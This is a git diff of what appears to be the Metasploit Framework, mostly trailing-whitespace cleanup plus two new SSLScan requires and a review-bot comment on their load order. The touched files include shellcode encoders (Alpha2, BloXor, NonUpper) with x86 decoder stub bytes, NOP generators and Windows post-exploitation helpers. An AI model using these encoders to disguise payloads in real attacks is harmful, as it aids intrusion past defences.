@@ -94,7 +94,7 @@ module ShadowCopy end # - # Return the value of the shadowstorage parameter specified by + # Return the value of the shadowstorage parameter specified by # +param_name+ # def vss_get_storage_param(param_name) diff --git a/lib/msf/core/post/windows/user_profiles.rb b/lib/msf/core/post/windows/user_profiles.rb index 1a8c60f129..3f8b8485d8 100644 --- a/lib/msf/core/post/windows/user_profiles.rb +++ b/lib/msf/core/post/windows/user_profiles.rb @@ -11,8 +11,8 @@ module UserProfiles include Msf::Post::Windows::Accounts # - # Load the registry hive for each user on the machine and parse out the - # user profile information. Next, unload the hives we loaded and return + # Load the registry hive for each user on the machine and parse out the + # user profile information. Next, unload the hives we loaded and return # the user profiles. # def grab_user_profiles @@ -89,7 +89,7 @@ module UserProfiles end # - # Read HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList to + # Read HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList to # get a list of user profiles on the machine. # def read_profile_list diff --git a/lib/msf/core/rpc/v10/service.rb b/lib/msf/core/rpc/v10/service.rb index 3ff567ec67..b72b807d47 100644 --- a/lib/msf/core/rpc/v10/service.rb +++ b/lib/msf/core/rpc/v10/service.rb @@ -199,7 +199,7 @@ class Service def authenticate(token) stale = [] - + if not (token and token.kind_of?(::String)) return false end diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb index 4f3e025e73..0660f28f57 100644 --- a/lib/msf/core/session.rb +++ b/lib/msf/core/session.rb @@ -144,7 +144,7 @@ module Session # def tunnel_peer end - + # # Returns the host associated with the session # @@ -152,7 +152,7 @@ module Session # Prefer the overridden session host or target_host host = @session_host || self.target_host return host if host - + # Fallback to the tunnel_peer (contains port) peer = self.tunnel_peer return if not peer 
@@ -162,14 +162,14 @@ module Session bits.pop bits.join(':') end - + # # Override the host associated with this session # def session_host=(v) @session_host = v end - + # # Returns the port associated with the session # @@ -185,14 +185,14 @@ module Session port = bits.pop port.to_i end - + # # Override the host associated with this session # def session_port=(v) @session_port = v end - + # # Returns a pretty representation of the tunnel. # diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 84d2bece5a..5af15c0f85 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb @@ -57,7 +57,7 @@ if(RUBY_PLATFORM == 'java') trap Signal::list['INT'] do Thread.main.raise Interrupt.new end - + s.close end diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index 5f53bef07e..acbd5bad24 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb @@ -34,7 +34,7 @@ module Banner base = File.expand_path(File.dirname(__FILE__)) pathname = File.join(base, "logos", fname) fdata = "<< Missing banner: #{fname} >>" - begin + begin raise ArgumentError unless File.readable?(pathname) raise ArgumentError unless File.stat(pathname).size < 4096 fdata = File.open(pathname) {|f| f.read f.stat.size} diff --git a/lib/rex.rb b/lib/rex.rb index adc93d2535..93efde9c73 100644 --- a/lib/rex.rb +++ b/lib/rex.rb @@ -88,6 +88,10 @@ require 'rex/compat' # Platforms require 'rex/platforms' +# SSLScan +require 'rex/sslscan/scanner' +require 'rex/sslscan/result' + # Overload the Kernel.sleep() function to be thread-safe Kernel.class_eval(" diff --git a/lib/rex/arch/x86.rb b/lib/rex/arch/x86.rb index 64b7d52302..0e3d2fc223 100644 --- a/lib/rex/arch/x86.rb +++ b/lib/rex/arch/x86.rb 
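Review bot: The two requires added to lib/rex.rb load `rex/sslscan/scanner` before `rex/sslscan/result`, so the scanner file is evaluated before the result class exists. Neither file is shown in this part of the diff, so whether scanner.rb refers to the result class at load time is an assumption to confirm. If it does, either swap the order to `require 'rex/sslscan/result'` followed by `require 'rex/sslscan/scanner'`, or have scanner.rb require its own dependency. Because these requires are unconditional and rex.rb is the library's top-level loader, a load error in either file would hit every consumer of Rex, not only SSL scanning.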
@@ -23,25 +23,25 @@ module X86 EDI = BH = DI = 7 REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi' ] - + REG_NAMES16 = [ 'ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di' ] - + REG_NAMES8L = [ 'al', 'cl', 'dl', 'bl', nil, nil, nil, nil ] - + # Jump tp a specific register def self.jmp_reg(str) reg = reg_number(str) _check_reg(reg) "\xFF" + [224 + reg].pack('C') end - + # # Generate a LOOP instruction (Decrement ECX and jump short if ECX == 0) # def self.loop(offset) "\xE2" + pack_lsb(rel_number(offset, -2)) end - + # # This method returns the opcodes that compose a jump instruction to the # supplied relative offset. diff --git a/lib/rex/assembly/nasm.rb b/lib/rex/assembly/nasm.rb index c2c35d6859..41a8498a44 100644 --- a/lib/rex/assembly/nasm.rb +++ b/lib/rex/assembly/nasm.rb @@ -44,7 +44,7 @@ class Nasm # Open the temporary file tmp = Tempfile.new('nasmXXXX') tmp.binmode - + tpath = tmp.path opath = tmp.path + '.out' @@ -76,7 +76,7 @@ class Nasm tmp = Tempfile.new('nasmout') tmp.binmode - + tfd = File.open(tmp.path, "wb") tfd.write(raw) diff --git a/lib/rex/encoder/alpha2.rb b/lib/rex/encoder/alpha2.rb index 3a10e9abac..9d9fd51212 100644 --- a/lib/rex/encoder/alpha2.rb +++ b/lib/rex/encoder/alpha2.rb @@ -3,7 +3,7 @@ # # ________________________________________________________________________________ -# +# # ,sSSs,,s, ,sSSSs, ALPHA 2: Zero-tolerance. (build 07) # SS" Y$P" SY" ,SY # iS' dY ,sS" Unicode-proof uppercase alphanumeric shellcode encoding. diff --git a/lib/rex/encoder/alpha2/generic.rb b/lib/rex/encoder/alpha2/generic.rb index 13833d10e4..726fc6f301 100644 --- a/lib/rex/encoder/alpha2/generic.rb +++ b/lib/rex/encoder/alpha2/generic.rb 
@@ -31,39 +31,39 @@ class Generic def Generic.encode_byte(block, badchars) accepted_chars = default_accepted_chars.dup - + badchars.each_char {|c| accepted_chars.delete(c) } if badchars - + # No, not nipple. nibble_chars = Array.new(0x10) {[]} accepted_chars.each {|c| nibble_chars[c.unpack('C')[0] & 0x0F].push(c) } - + poss_encodings = [] - + block_low_nibble = block & 0x0F block_high_nibble = block >> 4 - + # Get list of chars suitable for expressing lower part of byte first_chars = nibble_chars[block_low_nibble] - + # Build a list of possible encodings first_chars.each do |first_char| first_high_nibble = first_char.unpack('C')[0] >> 4 - + # In the decoding process, the low nibble of the second char gets combined # (either ADDed or XORed depending on the encoder) with the high nibble of the first char, # and we want the high nibble of our input byte to result second_low_nibble = gen_second(block_high_nibble, first_high_nibble) & 0x0F - + # Find valid second chars for this first char and add each combination to our possible encodings second_chars = nibble_chars[second_low_nibble] second_chars.each {|second_char| poss_encodings.push(second_char + first_char) } end - + if poss_encodings.empty? raise RuntimeError, "No encoding of #{"0x%.2X" % block} possible with limited character set" end - + # Return a random encoding poss_encodings[rand(poss_encodings.length)] end diff --git a/lib/rex/encoder/alpha2/unicode_mixed.rb b/lib/rex/encoder/alpha2/unicode_mixed.rb index 5e3dbdd7e3..c91b2de0be 100644 --- a/lib/rex/encoder/alpha2/unicode_mixed.rb +++ b/lib/rex/encoder/alpha2/unicode_mixed.rb @@ -8,12 +8,12 @@ module Encoder module Alpha2 class UnicodeMixed < Generic - + def self.gen_second(block, base) # unicode uses additive encoding (block - base) end - + def self.gen_decoder_prefix(reg, offset) if (offset > 21) raise "Critical: Offset is greater than 21" 
@@ -27,7 +27,7 @@ class UnicodeMixed < Generic mod = 'AA' * (offset - 14) # inc ecx nop = 'CP' * (14 - mod.length) mod += nop - end + end regprefix = { # nops ignored below 'EAX' => 'PPYA' + mod, # push eax, pop ecx 'ECX' => mod + "4444", # dec ecx @@ -91,7 +91,7 @@ class UnicodeMixed < Generic "1A" + # add [ecx], dh NOP "IA" + # dec ecx, NOP "J" + # dec edx - "Q" + # add [ecx], dl + "Q" + # add [ecx], dl "YA" + # pop ecx, NOP "Z" + # pop edx "B" + # add [edx], al @@ -105,10 +105,10 @@ class UnicodeMixed < Generic "B" + # add [edx], al | "kM" + # imul eax, [eax], 10 * | "A" + # add [edx], al | - "G" + # inc edi | + "G" + # inc edi | "B" + # add [edx], al | "9" + # cmp [eax], eax | - "u" + # jnz ------------------ + "u" + # jnz ------------------ "4JB" return decoder diff --git a/lib/rex/encoder/alpha2/unicode_upper.rb b/lib/rex/encoder/alpha2/unicode_upper.rb index 2e062bce34..adfb7b69bc 100644 --- a/lib/rex/encoder/alpha2/unicode_upper.rb +++ b/lib/rex/encoder/alpha2/unicode_upper.rb @@ -9,7 +9,7 @@ module Alpha2 class UnicodeUpper < Generic def self.default_accepted_chars ; ('B' .. 'Z').to_a + ('0' .. '9').to_a ; end - + def self.gen_second(block, base) # unicode uses additive encoding (block - base) @@ -40,7 +40,7 @@ class UnicodeUpper < Generic 'ESI' => 'VVYA' + mod, # push esi, pop ecx 'EDI' => 'WWYA' + mod, # push edi, pop edi '[ESP]' => 'YA' + mod + '44', # - '[ESP+4]' => 'YUYA' + mod, # + '[ESP+4]' => 'YUYA' + mod, # } return regprefix[reg] diff --git a/lib/rex/encoder/bloxor/bloxor.rb b/lib/rex/encoder/bloxor/bloxor.rb index b7684a32d1..952c5f1aa4 100644 --- a/lib/rex/encoder/bloxor/bloxor.rb +++ b/lib/rex/encoder/bloxor/bloxor.rb @@ -13,12 +13,12 @@ module Encoder @blocks_out = [] @block_size = 0 end - + # # # def decoder_stub( state ) - + if( not state.decoder_stub ) @blocks_out = [] @block_size = 0 
@@ -28,34 +28,34 @@ module Encoder # anything too big (if we knew the max size we could try something smaller if we generated a blob too big) #block_sizes = (1..state.buf.length).to_a.shuffle #block_sizes.each do | len | - + 1.upto( state.buf.length ) do | len | - + # For now we ignore all odd sizes to help with performance (The rex poly machine # doesnt have many load/store primitives that can handle byte sizes efficiently) if( len % 2 != 0 ) next end - + blocks, size = compute_encoded( state, len ) if( blocks and size ) - + # We sanity check that the newly generated block ammount and the block size # are not in the badchar list when converted into a hex form. Helps speed # things up a great deal when generating a decoder stub later as these # values may be used throughout. - + if( not number_is_valid?( state, blocks.length - 1 ) or not number_is_valid?( state, ~( blocks.length - 1 ) ) ) next end - + if( not number_is_valid?( state, size ) or not number_is_valid?( state, ~size ) ) next end - + @blocks_out = blocks @block_size = size - + break end end @@ -64,26 +64,26 @@ module Encoder state.decoder_stub = compute_decoder( state ) end - + state.decoder_stub end - + # # # def encode_block( state, data ) - + buffer = '' - + @blocks_out.each do | block | buffer << block.pack( 'C*' ) end - + buffer end - + protected - + # # Is a number in its byte form valid against the badchars? # @@ -96,7 +96,7 @@ module Encoder end return Rex::Text.badchar_index( [ number ].pack( size ), state.badchars ).nil? end - + # # Calculate Shannon's entropy. # 
@@ -110,44 +110,44 @@ module Encoder end return entropy / 8 end - + # # Compute the encoded blocks (and associated seed) # def compute_encoded( state, len ) blocks_in = ::Array.new - + input = '' << state.buf - + block_padding = ( input.length % len ) > 0 ? len - ( input.length % len ) : 0 - + if( block_padding > 0 ) 0.upto( block_padding-1 ) do input << [ rand( 255 ) ].pack( 'C' ) end end - + while( input.length > 0 ) blocks_in << input[0..len-1].unpack( 'C*' ) input = input[len..input.length] end - + seed = compute_seed( blocks_in, len, block_padding, state.badchars.unpack( 'C*' ) ) if( not seed ) return [ nil, nil ] end - + blocks_out = [ seed ] - + blocks_in.each do | block | blocks_out << compute_block( blocks_out.last, block ) - end - + end + return [ blocks_out, len ] end - + # # Generate the decoder stub which is functionally equivalent to the following: # @@ -166,13 +166,13 @@ module Encoder # end: # def compute_decoder( state ) - + @machine.create_variable( 'source' ) @machine.create_variable( 'dest' ) @machine.create_variable( 'counter' ) @machine.create_variable( 'encoded' ) @machine.create_variable( 'decoded' ) - + chunk_size = Rex::Poly::Machine::BYTE if( @machine.native_size() == Rex::Poly::Machine::QWORD ) if( @block_size % Rex::Poly::Machine::QWORD == 0 ) @@ -181,13 +181,13 @@ module Encoder chunk_size = Rex::Poly::Machine::DWORD elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) chunk_size = Rex::Poly::Machine::WORD - end + end elsif( @machine.native_size() == Rex::Poly::Machine::DWORD ) if( @block_size % Rex::Poly::Machine::DWORD == 0 ) chunk_size = Rex::Poly::Machine::DWORD elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) chunk_size = Rex::Poly::Machine::WORD - end + end elsif( @machine.native_size() == Rex::Poly::Machine::WORD ) if( @block_size % Rex::Poly::Machine::WORD == 0 ) chunk_size = Rex::Poly::Machine::WORD 
@@ -202,7 +202,7 @@ module Encoder # Block 3 - Set the destingation variable to the value of the source variable @machine.create_block_primitive( 'block3', 'set', 'dest', 'source' ) - + # Block 4 - Set the destingation variable to the address of the 2nd encoded block @machine.create_block_primitive( 'block4', 'add', 'dest', @block_size ) @@ -211,35 +211,35 @@ module Encoder # Block 6 - Set the encoded variable to the byte pointed to by the dest variable @machine.create_block_primitive( 'block6', 'load', 'encoded', 'dest', chunk_size ) - + # Block 7 - Increment the destination variable by one @machine.create_block_primitive( 'block7', 'add', 'dest', chunk_size ) - + # Block 8 - Set the decoded variable to the byte pointed to by the source variable @machine.create_block_primitive( 'block8', 'load', 'decoded', 'source', chunk_size ) - + # Block 9 - Xor the decoded variable with the encoded variable @machine.create_block_primitive( 'block9', 'xor', 'decoded', 'encoded' ) - + # Block 10 - store the newly decoded byte @machine.create_block_primitive( 'block10', 'store', 'source', 'decoded', chunk_size ) - + # Block 11 - Increment the source variable by one @machine.create_block_primitive( 'block11', 'add', 'source', chunk_size ) - + # Block 12 - Jump back up to the outer_loop block while the counter variable > 0 @machine.create_block_primitive( 'block12', 'loop', 'counter', 'block6' ) # Try to generate the decoder stub... decoder = @machine.generate - + if( not decoder ) raise RuntimeError, "Unable to generate decoder stub." end - + decoder end - + # # Compute the seed block which will successfully decode all proceeding encoded # blocks while ensuring the encoded blocks do not contain any badchars. 
@@ -247,33 +247,33 @@ module Encoder def compute_seed( blocks_in, block_size, block_padding, badchars ) seed = [] redo_bytes = [] - + 0.upto( block_size-1 ) do | index | - + seed_bytes = (0..255).sort_by do rand() end - + seed_bytes.each do | seed_byte | - + next if( badchars.include?( seed_byte ) ) - + success = true - + previous_byte = seed_byte - + if( redo_bytes.length < 256 ) redo_bytes = (0..255).sort_by do rand() end end - + blocks_in.each do | block | - + decoded_byte = block[ index ] - + encoded_byte = previous_byte ^ decoded_byte - + if( badchars.include?( encoded_byte ) ) # the padding bytes we added earlier can be changed if they are causing us to fail. if( block == blocks_in.last and index >= (block_size-block_padding) ) @@ -284,31 +284,31 @@ module Encoder block[ index ] = redo_bytes.shift redo end - + success = false break end - + previous_byte = encoded_byte end - + if( success ) seed << seed_byte break end end - + end - + if( seed.length == block_size ) return seed end - + return nil end # - # Compute the next encoded block by xoring the previous + # Compute the next encoded block by xoring the previous # encoded block with the next decoded block. # def compute_block( encoded, decoded ) @@ -318,9 +318,9 @@ module Encoder end return block end - + end end -end \ No newline at end of file +end diff --git a/lib/rex/encoder/nonalpha.rb b/lib/rex/encoder/nonalpha.rb index 8cff4190fe..4cc954e019 100644 --- a/lib/rex/encoder/nonalpha.rb +++ b/lib/rex/encoder/nonalpha.rb @@ -32,7 +32,7 @@ class NonAlpha if (tablelen > 255) or (block == 0x7B) raise RuntimeError, "BadChar" end - + if (block >= 0x41 and block <= 0x5A) or (block >= 0x61 and block <= 0x7A) # gen offset, return magic offset = 0x7b - block; diff --git a/lib/rex/encoder/nonupper.rb b/lib/rex/encoder/nonupper.rb index d7a598620a..2356b160d5 100644 --- a/lib/rex/encoder/nonupper.rb +++ b/lib/rex/encoder/nonupper.rb 
@@ -7,8 +7,8 @@ module Rex module Encoder class NonUpper - - + + def NonUpper.gen_decoder() decoder = "\x66\xB9\xFF\xFF" + @@ -26,14 +26,14 @@ class NonUpper "\x28\x07" + # subb [edi], al "\xEB\xF1" + # jmp BACK! "\xEB" + "B" + # jmp [shellcode] - "\xE8\xE2\xFF\xFF\xFF" + "\xE8\xE2\xFF\xFF\xFF" end def NonUpper.encode_byte(badchars, block, table, tablelen) if (tablelen > 255) or (block == 0x40) raise RuntimeError, "BadChar" end - + if (block >= 0x41 and block <= 0x40) or (badchars =~ block) # gen offset, return magic offset = 0x40 - block; diff --git a/lib/rex/encoding/xor/generic.rb b/lib/rex/encoding/xor/generic.rb index 6a1c538a0d..3f94071596 100644 --- a/lib/rex/encoding/xor/generic.rb +++ b/lib/rex/encoding/xor/generic.rb @@ -19,7 +19,7 @@ class Generic # # Now for some internal check methods - # + # # hook stylies! # return index of offending byte or nil @@ -82,7 +82,7 @@ class Generic if !badkeys[strip][kbyte] && !badchars[kbyte.chr] throw :found_kbyte end - + kbyte = (kbyte + 1) & 0xff } diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb index 4a4a8b62c8..0b3f5faa83 100644 --- a/lib/rex/image_source/disk.rb +++ b/lib/rex/image_source/disk.rb @@ -31,7 +31,7 @@ class Disk < ImageSource file.seek(file_offset + offset) file.read(len) end - + def index(search, offset = 0) # do a sliding window search across the disk while offset < size diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb index 9f2456cd43..549388fc4e 100644 --- a/lib/rex/image_source/image_source.rb +++ b/lib/rex/image_source/image_source.rb @@ -39,7 +39,7 @@ class ImageSource end return string end - + end diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb index 5fa926ff28..24c5ce55cc 100644 --- a/lib/rex/io/datagram_abstraction.rb +++ b/lib/rex/io/datagram_abstraction.rb 
@@ -26,7 +26,7 @@ module DatagramAbstraction attr_reader :lsock # The right side of the stream (remote) attr_reader :rsock - + protected attr_writer :lsock attr_writer :rsock diff --git a/lib/rex/io/stream.rb b/lib/rex/io/stream.rb index a7dffc368b..7ea11f8c35 100644 --- a/lib/rex/io/stream.rb +++ b/lib/rex/io/stream.rb @@ -36,7 +36,7 @@ module Stream total_sent = 0 total_length = buf.length block_size = 32768 - + begin while( total_sent < total_length ) s = Rex::ThreadSafe.select( nil, [ fd ], nil, 0.2 ) @@ -59,7 +59,7 @@ module Stream rescue ::IOError, ::Errno::EPIPE return nil end - + total_sent end @@ -67,9 +67,9 @@ module Stream # This method reads data of the supplied length from the stream. # def read(length = nil, opts = {}) - + begin - return fd.read_nonblock( length ) + return fd.read_nonblock( length ) rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK # Sleep for a half a second, or until we can read again Rex::ThreadSafe.select( [ fd ], nil, nil, 0.5 ) diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index 6d40b21753..65c2b24f9b 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -74,14 +74,14 @@ module StreamAbstraction def syswrite(buffer) lsock.syswrite(buffer) end - + # # Low-level read from the local side. # def sysread(length) lsock.sysread(length) end - + # # Shuts down the local side of the stream abstraction. # @@ -164,7 +164,7 @@ protected while( total_sent < total_length ) begin data = buf[total_sent, buf.length] - + # Note that this must be write() NOT syswrite() or put() or anything like it. # Using syswrite() breaks SSL streams. sent = self.write( data ) diff --git a/lib/rex/io/stream_server.rb b/lib/rex/io/stream_server.rb index 8ed10692bb..b314f3e4f7 100644 --- a/lib/rex/io/stream_server.rb +++ b/lib/rex/io/stream_server.rb @@ -156,7 +156,7 @@ protected # Initialize the connection processing on_client_connect(cli) - + # Notify the client monitor self.client_waiter.push(cli) 
@@ -178,7 +178,7 @@ protected # def monitor_clients begin - + # Wait for a notify if our client list is empty if (clients.length == 0) self.client_waiter.pop diff --git a/lib/rex/job_container.rb b/lib/rex/job_container.rb index cda3afd3ea..acac8ae7f5 100644 --- a/lib/rex/job_container.rb +++ b/lib/rex/job_container.rb @@ -189,7 +189,7 @@ class JobContainer < Hash end list.each(&block) end - + protected attr_accessor :job_id_pool # :nodoc: diff --git a/lib/rex/logging/sinks/stderr.rb b/lib/rex/logging/sinks/stderr.rb index 3ed78801fc..333f157acf 100644 --- a/lib/rex/logging/sinks/stderr.rb +++ b/lib/rex/logging/sinks/stderr.rb @@ -33,7 +33,7 @@ class Stderr end $stderr.write("[#{get_current_timestamp}] [#{code}(#{level})] #{src}: #{msg}\n") end - + $stderr.flush end diff --git a/lib/rex/mac_oui.rb b/lib/rex/mac_oui.rb index 5ec1eaa458..d9e53d80e7 100644 --- a/lib/rex/mac_oui.rb +++ b/lib/rex/mac_oui.rb @@ -12,7 +12,7 @@ module Oui return fullname else return 'UNKNOWN' - end + end end def self.lookup_oui_company_name(mac) @@ -25,7 +25,7 @@ module Oui return fullname else return 'UNKNOWN' - end + end end def self.check_mac(mac) diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb index 143a1c8de0..290b79458c 100644 --- a/lib/rex/mime/part.rb +++ b/lib/rex/mime/part.rb @@ -4,7 +4,7 @@ module MIME class Part require 'rex/mime/header' - + attr_accessor :header, :content def initialize diff --git a/lib/rex/nop/opty2.rb b/lib/rex/nop/opty2.rb index 6a56521dea..d8ecee25f8 100644 --- a/lib/rex/nop/opty2.rb +++ b/lib/rex/nop/opty2.rb @@ -61,7 +61,7 @@ class Opty2 # Skip it if it's masked off or too large next if ((e & mask) != 0) next if (((e >> 8) & 0xff) > slen) - + byte = e & 0xff # Skip it if it's a bad byte diff --git a/lib/rex/nop/opty2_tables.rb b/lib/rex/nop/opty2_tables.rb index 65f03ae52d..1ce66badba 100644 --- a/lib/rex/nop/opty2_tables.rb +++ b/lib/rex/nop/opty2_tables.rb 
@@ -18,7 +18,7 @@ module Opty2Tables 66005,65750,245,248,249,252,253,359 ] - StateTable = + StateTable = [ # 0x00 [[65796,66565,1048582,65804,66573,1048590,65812,66581,1048598,65820,66589,1048606,65828,66597,65575,65836,66605,65583,65844,66613,65591,316,1085,65599,65600,131137,262210,524355,1048644,2097221,4194374,8388679,65608,131145,262218,524363,1048652,2097229,4194382,8388687,1048656,1048657,1048658,1048659,1048660,1048661,1048662,1048663,1114200,1179737,1310810,1572955,1048668,3145821,5242974,9437279,1048672,1049704,1048938,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,144,196753,327826,589971,1114260,2162837,4259990,8454295,65688,262297,155,1048732,65695,424,1193,65968,131505,262578,524723,65972,131509,262582,524727,66744,132281,263354,525499,1049788,2098365,4195518,8389823,66005,65750,131552,131553,131554,483,491,245,248,249,252,253,358,359, 0x01018D]], diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb index 6f43c71f44..4b91038686 100644 --- a/lib/rex/ole/directory.rb +++ b/lib/rex/ole/directory.rb @@ -29,7 +29,7 @@ class Directory < DirEntry @num_entries = 1 end - + # woop, recursive each def yield_entries(de, &block) block.call(de) diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb index dd990cc110..adb016610a 100644 --- a/lib/rex/parser/fusionvm_nokogiri.rb +++ b/lib/rex/parser/fusionvm_nokogiri.rb @@ -8,7 +8,7 @@ module Parser load_nokogiri && class FusionVMDocument < Nokogiri::XML::SAX::Document - include NokogiriDocMixin + include NokogiriDocMixin def start_element(name=nil,attrs=[]) return nil if in_tag("JobOrder") @@ -26,7 +26,7 @@ module Parser } thost[:host] = attrs["IPAddress"] thost[:name] = attrs["HostName"] - @host = db_report(:host, thost) + @host = db_report(:host, thost) when "OS" @state[:has_text] = true when "Port" 
@@ -47,7 +47,7 @@ module Parser when "Title" @state[:has_text] = true when "Description" - @state[:has_text] = true + @state[:has_text] = true when "CVE" @state[:has_text] = true when "References" @@ -86,13 +86,13 @@ module Parser when "CVE" @vuln[:refs] << "CVE-#{@text.strip}" when "References" - unless @text.blank? + unless @text.blank? @text.split(' ').each do |ref| next unless ref.start_with? "http" if ref =~ /MS\d{2}-\d{3}/ @vuln[:refs] << "MSB-#{$&}" - else - @vuln[:refs] << "URL-#{ref.strip}" + else + @vuln[:refs] << "URL-#{ref.strip}" end end end @@ -106,4 +106,4 @@ module Parser end end -end \ No newline at end of file +end diff --git a/lib/rex/parser/ini.rb b/lib/rex/parser/ini.rb index da7d14d354..a5b6595d8e 100644 --- a/lib/rex/parser/ini.rb +++ b/lib/rex/parser/ini.rb @@ -14,7 +14,7 @@ class Ini < Hash # Factories # ## - + # # Creates a new class instance and reads in the contents of the supplied # file path. @@ -52,7 +52,7 @@ class Ini < Hash # # Enumerates the groups hash keys. # - def each_group(&block) + def each_group(&block) self.keys.each { |k| yield } @@ -87,7 +87,7 @@ class Ini < Hash # def from_file(fpath = nil) fpath = path if (!fpath) - + read_groups(fpath) end @@ -167,7 +167,7 @@ protected # Is it a group [bob]? if (md = line.match(/^\[(.+?)\]/)) - active_group = md[1] + active_group = md[1] self[md[1]] = {} # Is it a VAR=VAL? elsif (md = line.match(/^(.+?)=(.*)$/)) diff --git a/lib/rex/parser/ip360_aspl_xml.rb b/lib/rex/parser/ip360_aspl_xml.rb index 700045c413..dcc0e1f752 100644 --- a/lib/rex/parser/ip360_aspl_xml.rb +++ b/lib/rex/parser/ip360_aspl_xml.rb @@ -7,7 +7,7 @@ module Parser class IP360ASPLXMLStreamParser - + @vulnid = nil @appid = nil @location = nil @@ -49,7 +49,7 @@ class IP360ASPLXMLStreamParser @osid = attributes['id'].strip end end - + def text(str) case @state when :is_name diff --git a/lib/rex/parser/nexpose_raw_nokogiri.rb b/lib/rex/parser/nexpose_raw_nokogiri.rb index b7892e5762..87c67f3d8e 100644 
--- a/lib/rex/parser/nexpose_raw_nokogiri.rb +++ b/lib/rex/parser/nexpose_raw_nokogiri.rb @@ -13,7 +13,7 @@ module Rex attr_reader :tests NEXPOSE_HOST_DETAIL_FIELDS = %W{ nx_device_id nx_site_name nx_site_importance nx_scan_template nx_risk_score } - NEXPOSE_VULN_DETAIL_FIELDS = %W{ + NEXPOSE_VULN_DETAIL_FIELDS = %W{ nx_scan_id nx_vulnerable_since nx_pci_compliance_status @@ -115,7 +115,7 @@ module Rex when "solution" @state[:has_text] = false collect_vuln_solution - @text = nil + @text = nil when "tag" @state[:has_text] = false collect_tag @@ -217,20 +217,20 @@ module Rex # Mass update vulnerability details across the database based on conditions vdet_info = { :title => @report_data[:vuln]["title"] } vdet_info[:description] = @report_data[:vuln_description] unless @report_data[:vuln_description].to_s.empty? - vdet_info[:solution] = @report_data[:vuln_solution] unless @report_data[:vuln_solution].to_s.empty? + vdet_info[:solution] = @report_data[:vuln_solution] unless @report_data[:vuln_solution].to_s.empty? vdet_info[:nx_tags] = @report_data[:vuln_tags].sort.uniq.join(", ") if ( @report_data[:vuln_tags].kind_of?(::Array) and @report_data[:vuln_tags].length > 0 ) vdet_info[:nx_severity] = @report_data[:vuln]["severity"].to_f if @report_data[:vuln]["severity"] vdet_info[:nx_pci_severity] = @report_data[:vuln]["pciSeverity"].to_f if @report_data[:vuln]["pciSeverity"] vdet_info[:cvss_score] = @report_data[:vuln]["cvssScore"].to_f if @report_data[:vuln]["cvssScore"] vdet_info[:cvss_vector] = @report_data[:vuln]["cvssVector"] if @report_data[:vuln]["cvssVector"] - + %W{ published added modified }.each do |tf| next if not @report_data[:vuln][tf] ts = DateTime.parse(@report_data[:vuln][tf]) rescue nil next if not ts vdet_info[ "nx_#{tf}".to_sym ] = ts end - + ::Mdm::VulnDetail.where(:id => vdet_ids).update_all(vdet_info) @report_data[:vuln] = nil 
@@ -263,7 +263,7 @@ module Rex end - def record_formatted_content(name, eattrs) + def record_formatted_content(name, eattrs) attrs = attr_hash(eattrs) stack = nil @@ -293,7 +293,7 @@ module Rex when 'URLLink' @report_data[:formatted_link] = attrs["LinkURL"] else - + if @report_data[:formatted_indent] > 1 data = (" " * (@report_data[:formatted_indent])) + data end @@ -305,10 +305,10 @@ module Rex if data.length > 0 stack << data - end + end end - def collect_formatted_content(name) + def collect_formatted_content(name) stack = nil prefix = "" @@ -325,7 +325,7 @@ module Rex end return if not stack - + data = @text.to_s.strip.split(/\n+/).map{|t| t.strip}.join(" ") @text = "" @@ -385,7 +385,7 @@ module Rex # This hash defines the matching criteria to overwrite an existing entry vkey = { :src => 'nexpose', :nx_vuln_id => @state[:test][:id] } - if @state[:nx_device_id] + if @state[:nx_device_id] vdet[:nx_device_id] = @state[:nx_device_id] vkey[:nx_device_id] = @state[:nx_device_id] end @@ -405,12 +405,12 @@ module Rex ts = ::DateTime.parse(@state[:test][:nx_vulnerable_since]) rescue nil vdet[:nx_vulnerable_since] = ts if ts end - + proof = clean_formatted_text(@report_data[:vuln_proof_stack].join.strip) @report_data[:vuln_proof_stack] = [] vuln_info[:info] = proof - vdet[:proof] = proof + vdet[:proof] = proof # Configure the find key for vuln_details vdet[:key] = vkey @@ -423,7 +423,7 @@ module Rex # Report the vulnerability vuln = db.report_vuln(vuln_info) - + if vuln # Report the vulnerability details detail = db.report_vuln_details(vuln, vdet) 
